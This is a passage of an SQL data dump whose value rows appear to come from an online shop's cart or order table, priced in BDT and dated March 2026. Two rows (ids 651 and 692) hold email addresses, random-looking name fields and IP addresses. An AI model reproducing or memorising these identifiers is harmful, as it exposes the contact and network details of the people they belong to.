(649, 1, '2026-03-27 15:03:03', '2026-03-27 15:03:06', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(650, 1, '2026-03-27 17:04:00', '2026-03-27 17:04:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(651, 1, '2026-03-27 17:53:07', '2026-03-27 17:53:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 130, NULL, 1, 'o.seme.j.u.z.i.0.8@gmail.com', NULL, 'aJpTXDrmzKqdbbIbfBdlvUao', NULL, 'ZCjGpoNRyWdtFkwepg', NULL, NULL, NULL, 1, 0, '45.137.70.158', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(652, 1, '2026-03-27 17:53:10', '2026-03-27 17:53:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(653, 1, '2026-03-27 18:09:48', '2026-03-27 18:09:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(654, 1, '2026-03-27 18:20:36', '2026-03-27 18:21:29', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(655, 1, '2026-03-27 18:20:38', '2026-03-27 18:20:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(656, 1, '2026-03-27 18:20:39', '2026-03-27 18:20:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(657, 1, '2026-03-27 18:20:40', '2026-03-27 18:20:40', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(658, 1, '2026-03-27 18:20:41', '2026-03-27 18:20:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(659, 1, '2026-03-27 18:20:43', '2026-03-27 18:20:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(660, 1, '2026-03-27 18:20:44', '2026-03-27 18:20:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(661, 1, '2026-03-27 18:20:45', '2026-03-27 18:20:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(662, 1, '2026-03-27 18:20:47', '2026-03-27 18:20:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(663, 1, '2026-03-27 18:20:48', '2026-03-27 18:20:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(664, 1, '2026-03-27 18:20:49', '2026-03-27 18:20:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(665, 1, '2026-03-27 18:20:50', '2026-03-27 18:20:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(666, 1, '2026-03-27 18:20:52', '2026-03-27 18:20:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(667, 1, '2026-03-27 18:20:58', '2026-03-27 18:20:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(668, 1, '2026-03-27 18:21:00', '2026-03-27 18:21:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(669, 1, '2026-03-27 18:21:06', '2026-03-27 18:21:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(670, 1, '2026-03-27 18:21:14', '2026-03-27 18:21:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(671, 1, '2026-03-27 18:21:17', '2026-03-27 18:21:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(672, 1, '2026-03-27 18:21:20', '2026-03-27 18:21:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(673, 1, '2026-03-27 18:21:23', '2026-03-27 18:21:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(674, 1, '2026-03-27 18:21:26', '2026-03-27 18:21:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(675, 1, '2026-03-27 18:21:30', '2026-03-27 18:21:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(676, 1, '2026-03-27 18:21:33', '2026-03-27 18:21:33', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(677, 1, '2026-03-27 18:21:35', '2026-03-27 18:21:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(678, 1, '2026-03-27 18:21:37', '2026-03-27 18:21:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(679, 1, '2026-03-27 18:21:39', '2026-03-27 18:21:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(680, 1, '2026-03-27 18:42:28', '2026-03-27 18:42:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(681, 1, '2026-03-27 20:11:34', '2026-03-27 20:11:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(682, 1, '2026-03-27 21:25:01', '2026-03-27 21:25:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(683, 1, '2026-03-27 21:39:58', '2026-03-27 21:39:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(684, 1, '2026-03-27 21:40:06', '2026-03-27 21:40:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(685, 1, '2026-03-27 21:40:38', '2026-03-27 21:40:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(686, 1, '2026-03-27 21:41:05', '2026-03-27 21:41:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(687, 1, '2026-03-27 21:41:32', '2026-03-27 21:41:32', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(688, 1, '2026-03-28 00:56:58', '2026-03-28 00:56:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(689, 1, '2026-03-28 01:12:17', '2026-03-28 01:12:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(690, 1, '2026-03-28 01:46:17', '2026-03-28 01:46:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(691, 1, '2026-03-28 06:26:36', '2026-03-28 06:26:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(692, 1, '2026-03-28 09:04:06', '2026-03-28 09:04:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 131, NULL, 1, 'i.g.ut.e.liva8.2@gmail.com', NULL, 'AJmyOjofCXSEwapIB', NULL, 'qkFThLFbkAojVvazISESvyp', NULL, NULL, NULL, 1, 0, '185.220.100.240', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(693, 1, '2026-03-28 09:23:35', '2026-03-28 09:23:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(694, 1, '2026-03-28 11:12:32', '2026-03-28 11:12:32', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(695, 1, '2026-03-28 11:12:56', '2026-03-28 11:12:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(696, 1, '2026-03-28 11:12:58', '2026-03-28 11:12:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(697, 1, '2026-03-28 11:13:01', '2026-03-28 11:13:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(698, 1, '2026-03-28 11:13:03', '2026-03-28 11:13:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(699, 1, '2026-03-28 11:13:06', '2026-03-28 11:13:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(700, 1, '2026-03-28 11:13:08', '2026-03-28 11:13:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(701, 1, '2026-03-28 11:13:11', '2026-03-28 11:13:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(702, 1, '2026-03-28 11:13:13', '2026-03-28 11:13:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(703, 1, '2026-03-28 11:13:16', '2026-03-28 11:13:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(704, 1, '2026-03-28 11:13:19', '2026-03-28 11:13:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(705, 1, '2026-03-28 11:13:21', '2026-03-28 11:13:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(706, 1, '2026-03-28 11:13:24', '2026-03-28 11:13:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(707, 1, '2026-03-28 11:13:26', '2026-03-28 11:13:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(708, 1, '2026-03-28 11:13:35', '2026-03-28 11:13:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(709, 1, '2026-03-28 11:47:23', '2026-03-28 11:47:24', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
